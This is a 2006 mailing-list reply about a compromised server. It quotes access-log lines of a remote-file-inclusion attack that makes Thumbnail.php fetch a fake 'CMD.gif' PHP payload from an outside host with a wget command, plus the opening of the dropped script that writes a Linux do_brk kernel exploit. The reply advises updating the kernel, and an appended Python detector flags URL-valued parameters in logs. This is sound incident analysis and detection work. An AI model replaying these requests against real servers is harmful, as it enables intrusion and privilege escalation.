On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 
> http://213.202.214.106/CMD.gif isn't a gif.
> 
> [snip]
> 
> if ($kernel == "write") {
>    $kernel = "/*\n" .
>              " * hatorihanzo.c\n" .
>              " * Linux kernel do_brk vma overflow exploit.\n" .
>              " *\n" .
>              " * The bug was found by Paul (IhaQueR) Starzetz <[EMAIL PROTECTED]>\n" .
>              " *\n" .
>              " * Further research and exploit development by\n" .
>              " * Wojciech Purczynski <[EMAIL PROTECTED]> and Paul Starzetz.\n" .
>              " *\n" .
>              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
>              " *\n" .
>              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
>              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
> 
> [/snip]
> 
> I think this will give you an idea of what happened.

Keep your kernel up to date; this is easiest if you use the Debian-provided
linux images, as they have security support.
This hole has long been closed there.

-- 
maks
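
Detection logic for the request pattern in the quoted log lines, as an added example that is not part of either post: it flags access-log entries in which a query parameter's value is itself an absolute URL, the shape of the `base_path=http://...` requests above, and records whether the server refused the request. The sample lines are constructed and use documentation addresses; `scan` and `remote_include_params` are names chosen for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL.
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation addresses, not taken from the thread).
SAMPLE = [
    '192.0.2.44 - - [03/Nov/2006:17:26:03 +0100] "GET http://203.0.113.5/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://198.51.100.7/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "-" "Mozilla/4.0"',
    '192.0.2.45 - - [03/Nov/2006:17:30:00 +0100] "GET /x.php?inc=http%3A%2F%2F198.51.100.7%2Fa.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.46 - - [03/Nov/2006:17:31:10 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
]


def remote_include_params(query):
    """Return (name, value) pairs whose decoded value is an absolute URL."""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(v)]


def scan(lines):
    """Yield one finding per log line carrying a URL-valued query parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        try:
            parts = urlsplit(m.group("target"))
        except ValueError:  # malformed target, e.g. an unbalanced "[" in the host
            continue
        hits = remote_include_params(parts.query)
        if hits:
            status = int(m.group("status"))
            yield {
                "client": m.group("host"),
                "time": m.group("time"),
                "path": parts.path,
                "params": hits,
                "status": status,
                # 2xx/3xx means the server processed the request: check the host.
                "served": status < 400,
            }


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Legitimate redirect or callback parameters that carry full URLs will also match, so an allowlist of known parameter names per application keeps the output reviewable.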

